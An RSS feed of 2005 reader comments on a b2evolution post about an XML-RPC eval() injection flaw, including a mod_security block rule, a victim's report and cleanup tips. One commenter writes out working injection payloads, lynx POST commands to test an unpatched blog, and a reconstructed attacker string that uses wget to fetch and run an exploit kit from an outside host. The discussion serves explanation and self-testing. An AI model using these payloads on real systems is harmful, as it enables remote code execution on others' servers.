b2evolution News Blog - Latest Comments on Fix for XML-RPC vulnerability (again!) https://b2evolution.net/news/?disp=comments en-US http://backend.userland.com/rss 60 StevensF in response to: Fix for XML-RPC vulnerability (again!) Thu, 24 Nov 2005 18:58:17 +0000 StevensF c7232@https://b2evolution.net/ <p>Keep on the good work.<br /> </p> Keep on the good work.

]]> https://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c7232 jwedgeco in response to: Fix for XML-RPC vulnerability (again!) Wed, 12 Oct 2005 10:37:31 +0000 c5200@https://b2evolution.net/ <p>If you can&#8217;t patch or are extra paranoid, try this mod_security rule</p> <p># block access to b2evolutions <a href="http://www.tellmewhatis.com/xml" rel="nofollow ugc">xml</a> interface<br /> SecFilterSelective REQUEST_URI &#8220;/blogs/xmlsrv/xmlrpc.php&#8221;</p> If you can’t patch or are extra paranoid, try this mod_security rule

# block access to b2evolutions xml interface
SecFilterSelective REQUEST_URI “/blogs/xmlsrv/xmlrpc.php”

]]> https://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c5200 Enric Naval in response to: Fix for XML-RPC vulnerability (again!) Fri, 16 Sep 2005 11:58:57 +0000 Enric Naval c4580@https://b2evolution.net/ <p>(continues)</p> <p>I don&#8217;t know the variable that was used for the exploit, but if you ever get to know its name then you can attempt to hack your unpatched weblog using this. Replace &#8220;var_name&#8221; and &#8220;weblog_url". That&#8217;s <b>your</b> unpatched weblog, not <b>an</b> :)</p> <p>(you have to escape the single quotes for &#8220;echo&#8221; to work)</p> <p><code><br /> echo '<br /> var_name=,\'\');echo \'I got hacked.\';exit;/*<br /> ---<br /> ' | lynx -post_data weblog_url/xmlsrv/xmlrpc.php <br /> </code></p> <p>And of course:</p> <p><code><br /> echo '<br /> var_name=,\'\');echo \'Hello, world.\';mail(root,\'p0wned!\',\'Patch b2evolution for XML-RPC.\');exit;/*<br /> ---<br /> ' | lynx -post_data weblog_url/xmlsrv/xmlrpc.php <br /> </code></p> (continues)

I don’t know the variable that was used for the exploit, but if you ever get to know its name then you can attempt to hack your unpatched weblog using this. Replace “var_name” and “weblog_url". That’s your unpatched weblog, not an :)

(you have to escape the single quotes for “echo” to work)


echo '
var_name=,\'\');echo \'I got hacked.\';exit;/*
---
' | lynx -post_data weblog_url/xmlsrv/xmlrpc.php

And of course:


echo '
var_name=,\'\');echo \'Hello, world.\';mail(root,\'p0wned!\',\'Patch b2evolution for XML-RPC.\');exit;/*
---
' | lynx -post_data weblog_url/xmlsrv/xmlrpc.php

]]> https://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4580 Enric Naval in response to: Fix for XML-RPC vulnerability (again!) Fri, 16 Sep 2005 11:56:56 +0000 Enric Naval c4579@https://b2evolution.net/ <p>So, my hacker, as seen in former posts, probably used a query string like this :</p> <p><code><br /> var=,'')); system('wget linuxgods\.go\.ro/local\.tgz; tar -xzf local.tgz /tmp; nohup /tmp/local/exploit.sh&amp;;');exit;/*<br /> </code></p> <p>Download the program, uncompress and execute in background using nohup so the program will continue running after its father (the PHP page) has died.</p> So, my hacker, as seen in former posts, probably used a query string like this :


var=,'')); system('wget linuxgods\.go\.ro/local\.tgz; tar -xzf local.tgz /tmp; nohup /tmp/local/exploit.sh&;');exit;/*

Download the program, uncompress and execute in background using nohup so the program will continue running after its father (the PHP page) has died.

]]> https://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4579 Enric Naval in response to: Fix for XML-RPC vulnerability (again!) Fri, 16 Sep 2005 11:38:31 +0000 Enric Naval c4577@https://b2evolution.net/ <p>According to the explanation for the XML-RPC exploit, the problem is that they use eval() in data extracted from $HTTP_RAW_POST_DATA. </p> <p>Gulf Tech report of XML-RPC vulnerability</p> <p>They say the problem is that magic_quotes_gpc() isn&#8217;t applied to $HTTP_RAW_POST_DATA, so you can POST a parameter containing a single quote.</p> <p>This single quote, which was not escaped using magic_quotes_gpc(), allows you to end a string with the single quote, add a semicolon &#8220;;&#8221; to end the actual statement and execute whatever code you fancy.</p> <p>So, for example, if you know that the page is reading the variable &#8220;var&#8221; from the raw POST, you can send this query string.</p> <p><code><br /> var=,'')); phpinfo(); exit;/*<br /> </code></p> <p>In this case, I believe that &#8220;,'&#8217;));&#8221; finishes correctly the actual call to eval. Everything after the semicolon will be then executed by the server as if it was code in the PHP page.</p> <p>&#8220;phpinfo();&#8221; This executes phpinfo() <br /> &#8220;exit;&#8221; This exits the PHP page.<br /> &#8220;/*&#8221; and then it comments the rest of the code, so it won&#8217;t execute and won&#8217;t dump error to some log.</p> <p>(I will continue later, I have problems posting)</p> According to the explanation for the XML-RPC exploit, the problem is that they use eval() in data extracted from $HTTP_RAW_POST_DATA.

Gulf Tech report of XML-RPC vulnerability

They say the problem is that magic_quotes_gpc() isn’t applied to $HTTP_RAW_POST_DATA, so you can POST a parameter containing a single quote.

This single quote, which was not escaped using magic_quotes_gpc(), allows you to end a string with the single quote, add a semicolon “;” to end the actual statement and execute whatever code you fancy.

So, for example, if you know that the page is reading the variable “var” from the raw POST, you can send this query string.


var=,'')); phpinfo(); exit;/*

In this case, I believe that “,'’));” finishes correctly the actual call to eval. Everything after the semicolon will be then executed by the server as if it was code in the PHP page.

“phpinfo();” This executes phpinfo()
“exit;” This exits the PHP page.
“/*” and then it comments the rest of the code, so it won’t execute and won’t dump error to some log.

(I will continue later, I have problems posting)

]]> https://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4577 Lenwood in response to: Fix for XML-RPC vulnerability (again!) Mon, 05 Sep 2005 03:43:40 +0000 Lenwood c4393@https://b2evolution.net/ <p>Can someone explain how to test this properly?</p> <p>Thanks,<br /> Chris</p> Can someone explain how to test this properly?

Thanks,
Chris

]]> https://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4393 wrabbit in response to: Fix for XML-RPC vulnerability (again!) Sat, 03 Sep 2005 19:04:30 +0000 c4278@https://b2evolution.net/ <p>Yeah, they just got me yesterday. Someone used it to upload a mail-sending PHP script, which they used to send out paypal scam emails. My host disabled my site until I was able to figure out how it happened.</p> Yeah, they just got me yesterday. Someone used it to upload a mail-sending PHP script, which they used to send out paypal scam emails. My host disabled my site until I was able to figure out how it happened.

]]> https://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4278 Enric Naval in response to: Fix for XML-RPC vulnerability (again!) Sat, 03 Sep 2005 13:06:35 +0000 Enric Naval c4230@https://b2evolution.net/ <p>note: I knew the hacking program hadn&#8217;t made anything harmful because I looked at ethereal and at the tcpdump output, and there were only the usual traffic plus the IRC connections. I actually executed the program myself to see what it did in the ethereal screen!</p> <p>note: I just found a hacking program in /tmp, seems the hacker managed to download the program, but couldn&#8217;t execute it. If you have had visitors to your xmlrpc file in access_log, and of you run apache as user &#8220;apache", look for strange directories in &#8220;/tmp&#8221; and &#8220;/var/tmp&#8221; and read this message. </p> <p>The last time I found the downloaded program binaries here:</p> <p>/tmp/ /.zbind </p> <p>/var/tmp/ /.zbind </p> <p>Notice the directory name is a single space. Notice the dot causes the directory not to be displayed when doing &#8220;ls -l".</p> <p>I had to delete the directory like this:</p> <p>rm &#8220;/tmp/ &#8220;</p> <p>To enter the directory</p> <p>cd &#8220;/tmp/ &#8220;</p> <p>or</p> <p>cd /tmp<br /> cd &#8221; &#8220;</p> <p>Well, that&#8217;s all. Good luck with your servers.</p> note: I knew the hacking program hadn’t made anything harmful because I looked at ethereal and at the tcpdump output, and there were only the usual traffic plus the IRC connections. I actually executed the program myself to see what it did in the ethereal screen!

note: I just found a hacking program in /tmp, seems the hacker managed to download the program, but couldn’t execute it. If you have had visitors to your xmlrpc file in access_log, and of you run apache as user “apache", look for strange directories in “/tmp” and “/var/tmp” and read this message.

The last time I found the downloaded program binaries here:

/tmp/ /.zbind

/var/tmp/ /.zbind

Notice the directory name is a single space. Notice the dot causes the directory not to be displayed when doing “ls -l".

I had to delete the directory like this:

rm “/tmp/ “

To enter the directory

cd “/tmp/ “

or

cd /tmp
cd ” “

Well, that’s all. Good luck with your servers.

]]> https://b2evolution.net/news/2005/08/31/fix_for_xml_rpc_vulnerability_again_1#c4230